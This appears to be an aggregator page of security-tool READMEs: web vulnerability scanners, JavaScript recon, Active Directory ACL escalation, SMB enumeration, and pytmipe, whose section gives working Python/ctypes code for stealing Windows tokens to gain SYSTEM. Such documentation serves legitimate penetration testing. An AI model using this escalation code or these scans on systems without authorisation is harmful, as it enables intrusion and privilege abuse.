  • Track your position on the leaderboard right here. Scores are a quantitative indicator of your success. Make progress, earn more points, and get to the top!
  • Collect hackcoins and exchange them for different items, including hints. The page displays the number of earned coins and hints.
  • There's always room for art. The platform creates individual skill graphs for your courses based on the received awards and completed practice assignments. What's your choice – attack or defense? Look at your strengths in cybersecurity and the skills you need to boost. 
  • Monitor your course progress and make plans for the next week or month.
The personal page is your identity. Share your achievements with friends on social media!

How good are you at cybersecurity?

A page with the results of practice assignments is available to all users.


Once an assignment is submitted, you can look at your results and estimate the time and effort it took to solve the problem. You can instantly see the stats: spent time, hints used, and earned hackcoins. The platform compares your results with those of other users, motivating you to stay ahead. 

Referral program

The most recent update introduces the referral program. 


Now, every user has a unique link that they can easily share with others wishing to join Hacktory. The platform will generously reward users with hackcoins, which can buy premium access.

Learning should be available to everyone, so access to courses is simplified, and free access has no time limit. It remains with you forever.

Hacktory is committed to sharing cybersecurity knowledge and experience and is open to partnering with organizations and universities. Hacktory's cybersecurity experts deliver regular webinars and workshops in Java and web application security, focusing on practical tasks. Stay tuned and follow us on Twitter, Facebook, or LinkedIn, and do not miss bug bounty tips, valuable materials, free webinars, and enjoyable contests.







Fast-Security-Scanners - Security Checks For Your Researches



A small contribution to the community :)

We use all these tools in security assessments and in our vulnerability monitoring service


Check your domain for DNS NS takeover (Repo)

docker run --dns=8.8.8.8 -e VULN_ID=dns_ns_takeover -e DOMAIN=site.com whitespots/dnsnstakeover


Cache Poisoning (Repo)

docker run --rm -it --name wcdscanner -e VULN_ID=wcd -e FIND_XSS=False -e DOMAIN=site.com whitespots/wcdxss


XSS via Meta tags (exploitable with cache poisoning) (Repo)

docker run --rm -it --name wcdscanner -e VULN_ID=xss_meta -e FIND_XSS=True -e DOMAIN=site.com whitespots/wcdxss


CORS misconfiguration on pages from Webarchives (Repo)

docker run --rm -it --name corsfinder -e VULN_ID=cors -e DOMAIN=site.com whitespots/corsfinder


CRLF vulnerabilities via url path and headers (Repo)

docker run --rm -it --name crlf-finder -e VULN_ID=crlf -e DOMAIN=site.com whitespots/crlf-finder


Path Traversal via url path (Repo)

docker run --rm -it --name ptrav-finder -e VULN_ID=ptrav -e DOMAIN=site.com whitespots/ptrav-finder


Check your 403 for bypasses (Repo)

docker run --rm --name forbid-bypasser -e VULN_ID=forbid_bypassed -e DOMAIN=site.com whitespots/forbid-bypasser


Find admin panels (Repo)

docker run --rm -it --name adminfinder -e VULN_ID=adminfinder -e DOMAIN=site.com whitespots/adminfinder


Check your site for social networks "accounts takeover" via broken social network links (Repo)

docker run --rm -it --name scanner -e VULN_ID=broken_social -e DOMAIN=site.com whitespots/brokensocial



JSFScan.sh - Automation For Javascript Recon In Bug Bounty



Blog can be found at https://medium.com/@patelkathan22/beginners-guide-on-how-you-can-use-javascript-in-bugbounty-492f6eb1f9ea?sk=21500dc4288281c7e6ed2315943269e7

A script made for all your JavaScript recon automation in bug bounty. Just pass a subdomain list to it, plus options according to your preference.


Features
1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.

Installation

There are two ways of executing this script: Either locally on the host machine or within a Docker container


Installing all dependencies locally

Note: Make sure you have installed golang properly before running the installation script locally.

$ sudo chmod +x install.sh
$ ./install.sh

Building the docker container

When using the docker version, everything will be installed automatically. You just have to execute the following commands:

$ git clone https://github.com/KathanP19/JSFScan.sh
$ cd JSFScan/
$ docker build . -t jsfscan

In order to start the pre-configured container run the following command:

$ docker run -it jsfscan "/bin/bash"

After that an interactive bash session should be opened.


Usage

The target list should include https:// and http:// schemes; use httpx or httprobe for this.

https://hackerone.com
https://github.com

And if you want to add a cookie, then edit the command at line 23: cat $target | hakrawler -js -cookie "cookie here" -depth 2 -scope subs -plain >> jsfile_links.txt

NOTE: If you feel the tool is slow, just comment out the hakrawler line (line 23) in the JSFScan.sh script, but it might result in slightly fewer JS file links.

 _______ ______ _______ ______                          _     
(_______/ _____(_______/ _____) | |
_ ( (____ _____ ( (____ ____ _____ ____ ___| |__
_ | | \____ \| ___) \____ \ / ___(____ | _ \ /___| _ \
| |_| | _____) | | _____) ( (___/ ___ | | | |_|___ | | | |
\___/ (______/|_| (______/ \____\_____|_| |_(_(___/|_| |_|

Usage:
-l Gather Js Files Links
-f Import File Containing JS Urls
-e Gather Endpoints For JSFiles
-s Find Secrets For JSFiles
-m Fetch Js Files for manual testing
-o Make an Output Directory to put all things Together
-w Make a wordlist using words from jsfiles
-v Extract Variables from the jsfiles
-d Scan for Possible DomXSS from jsfiles



Aclpwn.Py - Active Directory ACL Exploitation With BloodHound



Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. It takes a starting and ending point and will use Neo4j pathfinding algorithms to find the most efficient ACL based privilege escalation path. Aclpwn.py is similar to the PowerShell based Invoke-Aclpwn, which you can read about in our blog.
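
As a taste of what that pathfinding looks like, here is a hedged sketch that queries a BloodHound Neo4j database with the official neo4j Python driver. It uses Cypher's hop-count shortestPath rather than the weighted Dijkstra search aclpwn.py performs, and assumes the standard BloodHound schema with name properties on nodes:

from neo4j import GraphDatabase  # pip install neo4j

driver = GraphDatabase.driver("bolt://localhost:7687",
                              auth=("neo4j", "neo4j"))
query = (
    "MATCH p = shortestPath((u:User {name: $start})-[*1..]->"
    "(g:Group {name: $end})) RETURN p"
)
with driver.session() as session:
    for record in session.run(query, start="ALICE@CORP.LOCAL",
                              end="DOMAIN ADMINS@CORP.LOCAL"):
        print(record["p"])  # one candidate escalation path
driver.close()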


Dependencies and installation

Aclpwn.py is compatible with both Python 2.7 and 3.5+. It requires the neo4j-driver, impacket and ldap3 libraries. You can install aclpwn.py via pip: pip install aclpwn. For Python 3, you will need the python36 branch of impacket, since the master branch (and the versions published on PyPI) are Python 2 only at this point.


Usage

For usage and documentation, see the wiki, for example the quickstart page.


Features

aclpwn.py currently has the following features:

  • Direct integration with BloodHound and the Neo4j graph database (fast pathfinding)
  • Supports any reversible ACL based attack chain (no support for resetting user passwords right now)
  • Advanced pathfinding (Dijkstra) to find the most efficient paths
  • Support for exploitation with NTLM hashes (pass-the-hash)
  • Saves restore state, easy rollback of changes
  • Can be run via a SOCKS tunnel
  • Written in Python (2.7 and 3.5+), so OS independent

Mitigations and detection

aclpwn.py does not exploit any vulnerabilities, but relies on misconfigured (often because of delegated privileges) or insecure default ACLs. To solve these issues, it is important to identify potentially dangerous ACLs in your Active Directory environment with BloodHound. For detection, Windows Event Logs can be used. The relevant event IDs are described in our blog.



Enum4Linux-Ng - A Next Generation Version Of Enum4Linux (A Windows/Samba Enumeration Tool) With Additional Features Like JSON/YAML Export



enum4linux-ng.py is a rewrite of Mark Lowe's (former Portcullis Labs, now Cisco CX Security Labs) enum4linux.pl, a tool for enumerating information from Windows and Samba systems, aimed at security professionals and CTF players. The tool is mainly a wrapper around the Samba tools nmblookup, net, rpcclient and smbclient.


I made it for educational purposes for myself and to overcome issues with enum4linux.pl. It has the same functionality as the original tool (though it does some things differently). Unlike the original tool, it parses all output of the Samba tools and allows exporting all findings as a YAML or JSON file. The idea behind this is to allow other tools to import the findings and process them further. It is planned to add new features in the future.


Features
  • support for YAML and JSON output
  • colored console output (can be disabled via NO_COLOR)
  • ldapsearch and polenum are natively implemented
  • support for legacy SMBv1 connections
  • auto detection of IPC signing support
  • 'smart' enumeration will automatically disable tests which would otherwise fail
  • timeout support
  • IPv6 support (experimental)

Differences

Some things are implemented differently compared to the original enum4linux. These are the important differences:

  • RID cycling is not part of the default enumeration (-A) but can be enabled with -R
  • parameter naming is slightly different (e.g. -A instead of -a)

Credits

I'd like to thank and give credit to the people at former Portcullis Labs (now Cisco CX Security Labs), namely:

In addition, I'd like to thank and give credit to:

It was lots of fun reading your code! :)


Legal note

If you use the tool: Don't use it for illegal purposes.


Run
  1. Install dependencies (various options)
  2. $ git clone https://github.com/cddmp/enum4linux-ng && cd enum4linux-ng
  3. Run, e.g. $ ./enum4linux-ng.py -As <target> -oY out

If you prefer a Docker based installation, an example run can be found below.


Demo

This demonstrates a run against Windows Server 2012 R2 standard installation. The following command is being used:

enum4linux-ng.py 192.168.125.131 -u Tester -p 'Start123!' -oY out

A user 'Tester' with password 'Start123!' was created, and firewall access was allowed. Once the enumeration is finished, I scroll up so that the results become clearer. Since no other enumeration option is specified, the tool assumes -A, which behaves similarly to enum4linux's -a option. The user and password are passed in. The -oY option will export all enumerated data as a YAML file (out.yaml) for further processing. The tool automatically detects at the beginning that LDAP is not running on the remote host; it will therefore skip any further LDAP checks which would normally be part of the default enumeration.



The second demo shows a run against Metasploitable2. The following command is being used:

enum4linux-ng.py 192.168.125.145 -A -C

This time the -A and -C options are used. While the first one behaves similarly to enum4linux's -a option, the second one will enable enumeration of services. This time no credentials were provided. The tool automatically detects that it needs to use SMBv1. No YAML or JSON file is being written. Again I scroll up so that the results become clearer.



Usage
ENUM4LINUX - next generation

usage: enum4linux-ng.py [-h] [-A] [-As] [-U] [-G] [-Gm] [-S] [-C] [-P] [-O] [-L] [-I] [-R] [-N] [-w WORKGROUP] [-u USER] [-p PW] [-d] [-k USERS] [-r RANGES] [-s SHARES_FILE] [-t TIMEOUT]
[-v] [-oJ OUT_JSON_FILE | -oY OUT_YAML_FILE | -oA OUT_FILE]
host

This tool is a rewrite of Mark Lowe's enum4linux.pl, a tool for enumerating information from Windows and Samba systems. It is mainly a wrapper around the Samba tools nmblookup, net,
rpcclient and smbclient. Other than the original tool it allows to export enumeration results as YAML or JSON file, so that it can be further processed with other tools. The tool tries to
do a 'smart' enumeration. It first checks whether SMB or LDAP is accessible on the target. Depending on the result of this check, it will dynamically skip checks (e.g. LDAP checks if LDAP
is not running). If SMB is accessible, it will always check whether a session can be set up or not. If no session can be set up, the tool will stop enumeration. The enumeration process can
be interrupted with CTRL+C. If the options -oJ or -oY are provided, the tool will write out the current enumeration state to the JSON or YAML file, once it receives SIGINT triggered by
CTRL+C. The tool was made for security professionals and CTF players. Illegal use is prohibited.

positional arguments:
host

optional arguments:
-h, --help show this help message and exit
-A Do all simple enumeration including nmblookup (-U -G -S -P -O -N -I -L). This option is enabled if you don't provide any other option.
-As Do all simple short enumeration without NetBIOS names lookup (-U -G -S -P -O -I -L)
-U Get users via RPC
-G Get groups via RPC
-Gm Get groups with group members via RPC
-S Get shares via RPC
-C Get services via RPC
-P Get password policy information via RPC
-O Get OS information via RPC
-L Get additional domain info via LDAP/LDAPS (for DCs only)
-I Get printer information via RPC
-R Enumerate users via RID cycling
-N Do a NetBIOS names lookup (similar to nbtstat) and try to retrieve the workgroup from the output
-w WORKGROUP Specify workgroup/domain manually (usually found automatically)
-u USER Specify username to use (default "")
-p PW Specify password to use (default "")
-d Get detailed information for users and groups, applies to -U, -G and -R
-k USERS User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none). Used to get sid with "lookupsid known_username"
-r RANGES RID ranges to enumerate (default: 500-550,1000-1050)
-s SHARES_FILE Brute force guessing for shares
-t TIMEOUT Sets connection timeout in seconds (default: 5s)
-v Verbose, show full samba tools commands being run (net, rpcclient, etc.)
--keep Don't delete the Samba configuration file created during tool run after enumeration (useful with -v)
-oJ OUT_JSON_FILE Writes output to JSON file (extension is added automatically)
-oY OUT_YAML_FILE Writes output to YAML file (extension is added automatically)
-oA OUT_FILE Writes output to YAML and JSON file (extensions are added automatically)
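
The CTRL+C behaviour described in the help text (flushing the current enumeration state on SIGINT) can be approximated like this; a Python sketch with a stand-in results dict, not the tool's actual code:

import signal
import sys
import yaml  # PyYaml

results = {"users": [], "shares": []}  # stand-in for accumulated findings

def dump_and_exit(signum, frame):
    with open("out.yaml", "w") as f:
        yaml.safe_dump(results, f)  # write out whatever we have so far
    sys.exit(1)

signal.signal(signal.SIGINT, dump_and_exit)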

Installing dependencies

The tool uses the samba clients tools, namely:

  • nmblookup
  • net
  • rpcclient
  • smbclient

These should be available for all Linux distributions. The package is typically called smbclient, samba-client or something similar.
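
Before running the tool, you can quickly verify that those binaries are on your PATH. This is just an illustrative pre-flight check, not part of enum4linux-ng:

import shutil

# Check that the required Samba client binaries are installed and on PATH.
for tool in ("nmblookup", "net", "rpcclient", "smbclient"):
    print(f"{tool}: {'found' if shutil.which(tool) else 'MISSING'}")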

In addition, you will need the following Python packages:

  • ldap3
  • PyYaml
  • impacket

For faster processing of YAML (optional!) also install the following (it usually comes as a dependency of PyYaml on most Linux distributions):

  • LibYAML

Some examples for specific Linux distributions installations are listed below. Alternatively, distribution-agnostic ways (python pip, python virtual env and Docker) are possible.


Linux distribution specific

For all distribution examples below, LibYAML is already a dependency of the corresponding PyYaml package and will be therefore installed automatically.


ArchLinux
#  pacman -S smbclient python-ldap3 python-yaml impacket

Fedora/CentOS/RHEL

(tested on Fedora Workstation 31)

# dnf install samba-common-tools samba-client python3-ldap3 python3-pyyaml python3-impacket

Kali Linux/Debian/Ubuntu

(tested on Kali Linux 2020.1, recent Debian (e.g. Buster) or Ubuntu versions should work, for Ubuntu 18.04 or below use the Docker or Python virtual environment variant)

# apt install smbclient python3-ldap3 python3-yaml python3-impacket

Linux distribution-agnostic

Python pip

Depending on the Linux distribution either pip3 or pip is needed:

$ pip install pyyaml ldap3 impacket

Alternative:

$ pip install -r requirements.txt

Remember that you still need to install the Samba tools as mentioned above.


Python virtual environment
$ git clone https://github.com/cddmp/enum4linux-ng
$ cd enum4linux-ng
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install wheel
$ pip install -r requirements.txt

Then run via:

python3 enum4linux-ng.py -As <target>

Remember that you still need to install the Samba tools as mentioned above. In addition, make sure you run source venv/bin/activate every time you spawn a new shell. Otherwise the wrong Python interpreter with the wrong libraries will be used (your system one rather than the virtual environment's).


Docker
$ git clone https://github.com/cddmp/enum4linux-ng
$ docker build enum4linux-ng --tag enum4linux-ng

Once finished, an example run could look like this:

$ docker run -t enum4linux-ng -As <target>

Contribution and Support

Occasionally, the tool will print error messages like this:

Could not <some text here>, please open a GitHub issue

In that case, please rerun the tool with the -v and --keep options. This will allow you to see the exact command which caused the error message. Copy that command, run it in your terminal and redirect the output to a file. Then open a GitHub issue here, pasting the command and attaching the error output file. That helps with debugging the issue. Of course, you can also debug it yourself and make a pull request.

If the tool is helpful for you, I'm happy if you leave a star!



Pytmipe - Python Library And Client For Token Manipulations And Impersonations For Privilege Escalation On Windows



PYTMIPE (PYthon library for Token Manipulation and Impersonation for Privilege Escalation) is a Python 3 library for manipulating Windows tokens and managing impersonation in order to gain more privileges on Windows. TMIPE is the Python 3 client which uses the pytmipe library.


Content
  • A Python client: tmipe (python3 tmipe.py)
  • A Python library: pytmipe. Useful for including this project in another one
  • pyinstaller examples, for building standalone exes

Docs
  • Slides "Windows Token Manipulation, Impersonation & Privilege Escalation" (English): link

  • Article in MISC 112 (French): link


Main features
Method | Required Privilege(s) | OS (non-exhaustive) | Direct target (max)
------ | --------------------- | ------------------- | -------------------
Token creation & impersonation | username & password | All | local administrator
Token impersonation/theft | SeDebugPrivilege | All | nt authority\system
Parent PID spoofing (handle inheritance) | SeDebugPrivilege | >= Vista | nt authority\system
Service (SCM) | Local administrator (and high integrity level if UAC enabled) | All | nt authority\system or domain account
WMI Event | Local administrator (and high integrity level if UAC enabled) | All | nt authority\system
« Printer Bug » LPE | SeImpersonatePrivilege (service account) | Windows 8.1, 10 & Server 2012R2/2016/2019 | nt authority\system
RPCSS Service LPE | SeImpersonatePrivilege (service account) | Windows 10 & Server 2016/2019 | nt authority\system

Capabilities

The following non-exhaustive list shows some features implemented in pytmipe library:

  • Token and privileges management:
    • get, enable or disable privilege(s) on token for current or remote thread
    • get local or remote token information
    • get effective token for current thread (impersonation or primary token)
  • get extensive information about selected token(s):
    • elevation type, impersonation type, Linked token with details, SID, ACLs, default groups, primary group, owner, privileges, source
    • etc
  • List all tokens which are accessible (primary & impersonation tokens) from current thread:
    • 2 different methods implemented: the "thread" method and the "handle" method (preferred)
    • check if token can be impersonated
    • get information about each token (elevation type, impersonation type, Linked token, SID, etc)
    • get all tokens which are accessible by account name (SID)
  • Impersonate a token or user:
    • Make Token and Impersonate (requires credentials of user)
    • Token impersonation/theft (specific privileges are required): impersonate a chosen token
    • Create Process with a token (specific privileges are required): impersonate a chosen token and create new process
    • Impersonate first nt authority\system token found
    • impersonate primary token of remote process with pid
  • Escalation methods:
    • Parent PID Spoofing - Handle Inheritance
    • Service Manager via direct command or named pipe impersonation (see the ctypes sketch after this list): local administrator to nt authority\system (or other privileged account)
    • Task scheduler via direct command or named pipe impersonation: local administrator to nt authority\system
    • WMI job via direct command or named pipe impersonation: local administrator to nt authority\system
    • Printer Bug: SeImpersonatePrivilege to nt authority\system
    • RPCSS: SeImpersonatePrivilege to nt authority\system
    • Re-enable privileges via task scheduling and named pipe impersonation
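
Several of the methods above rely on named pipe impersonation: a privileged client is coerced into connecting to a pipe the attacker controls, and the server thread then assumes the client's token. The following is a minimal ctypes sketch of the underlying Win32 call sequence, not pytmipe's actual code; the pipe name is made up for illustration:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
kernel32.CreateNamedPipeW.restype = wintypes.HANDLE

PIPE_ACCESS_DUPLEX = 0x00000003
PIPE_TYPE_BYTE = 0x00000000
INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value
PIPE_NAME = r"\\.\pipe\demo_imp_pipe"  # hypothetical name, illustration only

# Create the server end of the pipe and block until a (privileged) client connects.
pipe = kernel32.CreateNamedPipeW(PIPE_NAME, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE,
                                 1, 4096, 4096, 0, None)
if pipe == INVALID_HANDLE_VALUE:
    raise ctypes.WinError(ctypes.get_last_error())
kernel32.ConnectNamedPipe(pipe, None)

# The client must have written at least one byte before
# ImpersonateNamedPipeClient can succeed, hence the ReadFile first.
buf = ctypes.create_string_buffer(1024)
read = wintypes.DWORD(0)
kernel32.ReadFile(pipe, buf, ctypes.sizeof(buf), ctypes.byref(read), None)

if not advapi32.ImpersonateNamedPipeClient(pipe):
    raise ctypes.WinError(ctypes.get_last_error())
# The calling thread now holds the client's token (e.g. SYSTEM if a service
# connected); do privileged work here, then revert and clean up.
advapi32.RevertToSelf()
kernel32.CloseHandle(pipe)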

Dependencies

ctypes is used as much as possible. Many features of pywin32 have been re-developed in pytmipe to avoid the use of pywin32, for better portability. However, the Task Scheduler module still uses pywin32 (more precisely pythoncom) for lack of time. All other modules use ctypes only.
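
To illustrate the ctypes-only approach, here is roughly what one such re-developed pywin32 feature looks like with raw ctypes: enabling a privilege (here SeDebugPrivilege, which the token impersonation/theft methods above require) on the current process token. This is a generic Win32 sketch under stated assumptions, not pytmipe's actual implementation:

import ctypes
from ctypes import wintypes

advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)

SE_PRIVILEGE_ENABLED = 0x00000002
TOKEN_ADJUST_PRIVILEGES = 0x0020
TOKEN_QUERY = 0x0008
ERROR_NOT_ALL_ASSIGNED = 1300

class LUID(ctypes.Structure):
    _fields_ = [("LowPart", wintypes.DWORD), ("HighPart", wintypes.LONG)]

class LUID_AND_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Luid", LUID), ("Attributes", wintypes.DWORD)]

class TOKEN_PRIVILEGES(ctypes.Structure):
    _fields_ = [("PrivilegeCount", wintypes.DWORD),
                ("Privileges", LUID_AND_ATTRIBUTES * 1)]

def enable_privilege(name):
    # Open our own process token with enough rights to adjust privileges.
    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(),
                                     TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                                     ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    # Translate the privilege name into a LUID.
    luid = LUID()
    if not advapi32.LookupPrivilegeValueW(None, name, ctypes.byref(luid)):
        raise ctypes.WinError(ctypes.get_last_error())
    tp = TOKEN_PRIVILEGES(1, (LUID_AND_ATTRIBUTES * 1)(
        LUID_AND_ATTRIBUTES(luid, SE_PRIVILEGE_ENABLED)))
    # AdjustTokenPrivileges can "succeed" without assigning anything,
    # so ERROR_NOT_ALL_ASSIGNED must be checked explicitly.
    if not advapi32.AdjustTokenPrivileges(token, False, ctypes.byref(tp),
                                          0, None, None):
        raise ctypes.WinError(ctypes.get_last_error())
    if ctypes.get_last_error() == ERROR_NOT_ALL_ASSIGNED:
        raise PermissionError(f"{name} is not held by this token")
    kernel32.CloseHandle(token)

enable_privilege("SeDebugPrivilege")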


HOW TO USE

For python client (named tmipe):

python.exe tmipe.py -h
usage: tmipe.py [-h] [--version]
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
...

888888 8b d8 88 88""Yb 888888
88 88b d88 88 88__dP 88__
88 88YbdP88 88 88""" 88""
88 88 YY 88 88 88 888888
-------------------------------------------
Token Manipulation, Impersonation and
Privilege Escalation (Tool)
-------------------------------------------
By Quentin HARDY (quentin.hardy@protonmail.com)

positional arguments:
{cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}

Choose a main command
cangetadmin Check if user can get admin access
printalltokens Print all tokens accessible from current thread
printalltokensbyname
Print all tokens accessible from current thread by account name
printalltokensbypid Print all tokens accessible from current thread by pid
printsystemtokens Print all system tokens accessible from current
searchimpfirstsystem
search and impersonate first system token
imppid impersonate primary token of selected pid and try to spawn cmd.exe
imptoken impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe
printerbug exploit the "printer bug" for getting system shell
rpcss exploit "rpcss" for getting system shell
spoof parent PID Spoofing ("handle inheritance")
impuser create process with creds with impersonation
runas create process with creds as runas
scm create process with Service Control Manager

optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit

For the Python library (named pytmipe), see the source code and examples. The source code is documented; most functions carry docstrings.

For pyinstaller examples and standalones, see the files in the src/examples/ folder.


Examples

If you want to know how to use the pytmipe library, see the src/examples folder for many examples.


Example 1: get nt authority\system

To impersonate the first system token and get a cmd.exe prompt as SYSTEM from the Python client (tmipe):

python.exe tmipe.py searchimpfirstsystem -vv

To do the same thing with the pytmipe library directly, see src/examples/searchAndImpersonateFirstSystemToken.py:

from impersonate import Impersonate
from utils import configureLogging

# Enable pytmipe's logging, then search all accessible tokens for the
# first nt authority\system one and impersonate it.
configureLogging()
imp = Impersonate()
imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)

It will open a cmd.exe prompt as SYSTEM if the current Windows user has the required rights.

Of course, from this source code you can create a standalone exe with pyinstaller.


Example 2: get tokens

To get the primary and impersonation tokens used in the current process:

python.exe tmipe.py printalltokens --current --full --linked

Output:

- PID: 3212
------------------------------
- PID: 3212
- type: Primary (1)
- token: 764
- hval: None
- ihandle: None
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-32-544
- Groups:
- S-1-5-32-544: {'Name': 'Administrators', 'Domain': 'BUILTIN', 'type': 4} (ENABLED, ENABLED_BY_DEFAULT, OWNER)
- S-1-1-0: {'Name': 'Everyone', 'Domain': '', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-5-11: {'Name': 'Authenticated Users', 'Domain': 'NT AUTHORITY', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
- S-1-16-16384: {'Name': 'System Mandatory Level', 'Domain': 'Mandatory Label', 'type': 10} (INTEGRITY_ENABLED, INTEGRITY)
- Privileges (User Rights):
- SeAssignPrimaryTokenPrivilege: Enabled
[...]
- SeTrustedCredManAccessPrivilege: Enabled
- issystem: True
- sessionID: 1
- elevationtype: Default (1)
- iselevated: True
- Linked Token: None
- tokensource: b'*SYSTEM*'
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Default DACL:
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0x10000000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-18'}
- {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0xa0020000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-32-544'}
[...]
- Mandatory Policy: NO_WRITE_UP

To get all tokens accessible from the current thread, organized by pid, limited to those that can be impersonated:

python.exe tmipe.py printalltokensbypid --imp-only

Output:

[...]
- PID 4276:
- S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
- PID 7252:
- None
- PID 1660:
- S-1-5-21-28624056-3392308708-440876048-1106: DOMAIN\USER (possible imp: True)
- S-1-5-20: NT AUTHORITY\NETWORK SERVICE (possible imp: True)
- S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
- S-1-5-90-0-1: Window Manager\DWM-1 (possible imp: True)
- S-1-5-19: NT AUTHORITY\LOCAL SERVICE (possible imp: True)
[...]

If you want to do this operation with the pytmipe library, it is easy too:

from impersonate import Impersonate
from utils import configureLogging

# Print every token accessible from the current thread, with full details
# and linked tokens, using the default "handle" method.
configureLogging()
imp = Impersonate()
imp.printAllTokensAccessible(targetPID=None, printFull=True, printLinked=True, _useThreadMethod=False)

Example 3: impersonate token

You can impersonate a selected token.

First step: get all tokens matching your filters (here, system tokens which can be impersonated by the current thread):

python.exe tmipe.py printalltokens --filter {\"sid\":\"S-1-5-18\",\"canimpersonate\":true}

Output:

[...]
- PID: 2288
------------------------------
- PID: 2288
- type: Impersonation (2)
- token: 2504
- ihandle: 118
- sid: S-1-5-18
- accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
- intlvl: System
- owner: S-1-5-18
- issystem: True
- elevationtype: Default (1)
- iselevated: True
- linkedtoken: None
- implevel: Impersonate (2)
- appcontainertoken: False
[...]
- primarysidgroup: S-1-5-18
- isrestricted: False
- hasrestricitions: True
- Mandatory Policy: VALID_MASK
- canimpersonate: True
[...]

The output above shows an impersonation token located in pid 2288 (ihandle 118), which has a system integrity level. This specific token can be impersonated with the following command:

python.exe tmipe.py imptoken --pid 2288 --ihandle 118 -vv

The command above opens a cmd.exe as nt authority\system.

This can be done with the pytmipe library too. The following source code impersonates the first available system token, prints the effective token, and then stops the impersonation:

from impersonate import Impersonate
from windef import TokenImpersonation

# Collect all impersonation tokens belonging to S-1-5-18 (SYSTEM) which
# the current thread is allowed to impersonate.
imp = Impersonate()
allTokens = imp.getTokensAccessibleFilter(targetPID=None,
                                          filter={'canimpersonate': True, 'sid': 'S-1-5-18', 'type': TokenImpersonation},
                                          _useThreadMethod=False)
if allTokens == {} or allTokens is None:
    print("No token found for impersonation")
else:
    # Use the first token of the first pid returned in 'allTokens'.
    pid = list(allTokens.keys())[0]
    firstIHandle = allTokens[pid][0]['ihandle']
    imp.printThisToken(allTokens, pid, firstIHandle)
    imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
    print("Current effective token for current thread after impersonation:")
    imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
    imp.terminateImpersonation()
    print("Current effective token for current thread (impersonation finished):")
    imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)

